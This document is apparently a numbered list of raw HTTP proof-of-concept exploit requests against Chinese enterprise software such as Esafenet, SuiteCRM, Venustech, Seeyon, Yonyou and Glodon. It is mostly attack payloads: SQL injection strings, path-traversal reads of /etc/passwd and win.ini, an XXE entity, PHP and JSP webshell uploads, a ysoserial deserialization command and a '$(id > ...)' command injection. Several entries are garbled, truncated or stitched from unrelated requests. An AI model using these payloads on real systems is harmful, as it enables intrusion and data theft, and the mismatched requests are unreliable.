1. 亿赛通 (Esafenet) Data Leakage Prevention System: SQL injection in the NetSecConfigAjax interface
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
2. SuiteCRM: SQL injection in responseEntryPoint
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
3. 启明星辰 (Venustech) 天清汉马 VPN: arbitrary file read in the download interface
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

command=delNotice&noticeId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--
6. 蓝凌 (Landray) EKP: remote command execution in sys_ui_component
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: 127.0.0.1
Accept: application/json,text/javascript,*/*;q=0.8
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
8. 致远 (Seeyon) AnalyticsCloud: arbitrary file read
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
10. 数字通指尖云平台 智慧政务 OA: SQL injection in PayslipUser
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
13. 用友 (Yonyou) U8 Cloud: deserialization vulnerability in MonitorServlet
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser

POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

payload
14. 云课网校系统 (Yunke online school system): arbitrary file upload in uploadImage
POST /api/uploader/uploadImage HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip,deflate,br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif

<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
15. 广联达 (Glodon) Linkworks: XML external entity injection in ArchiveWebService
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 <soap:Body>
 <PostArchiveInfo xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx">
 <archiveInfo><!DOCTYPE Archive [
    <!ENTITY secret SYSTEM "file:///windows/win.ini">
]>

<Archive>  
    <ArchiveInfo>  
        <UploaderID>
############


&secret;


##############
</UploaderID>  
    </ArchiveInfo>  
    <Result>  
        <MainDoc>Document Content</MainDoc>  
    </Result>  
    <DocInfo>  
        <DocTypeID>1</DocTypeID>  
        <DocVersion>1.0</DocVersion>  
    </DocInfo>  
</Archive></archiveInfo>
 <folderIdList>string</folderIdList>
 <platId>string</platId>
 </PostArchiveInfo>
 </soap:Body>
</soap:Envelope>
16. 启明星辰 (Venustech) 天玥 Network Security Audit System: SQL injection
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close

checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
17. 润乾报表 (Raqsoft Report): unauthenticated (front-end) arbitrary file upload
POST /InputServlet?action=12 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 127.0.0.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
19. 指挥调度管理平台 (command and dispatch management platform): information disclosure in ajax_users.php
/app/ext/ajax_users.php
20. 致远 (Seeyon) OA: front-end file upload bypass in fileUpload.do
1. Upload an image webshell; the response returns the fileid value
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
Content-Length: 754

--00content0boundary00
Content-Disposition: form-data; name="type"

--00content0boundary00
Content-Disposition: form-data; name="extensions"

png
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"

--00content0boundary00
Content-Disposition: form-data; name="destDirectory"

--00content0boundary00
Content-Disposition: form-data; name="destFilename"

--00content0boundary00
Content-Disposition: form-data; name="maxSize"

--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"

false
--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="1.png"
Content-Type: Content-Type: application/pdf

<% out.println("hello");%>
--00content0boundary00--

2. Change the file suffix to jsp
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8

{"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/ccc.txt)"}}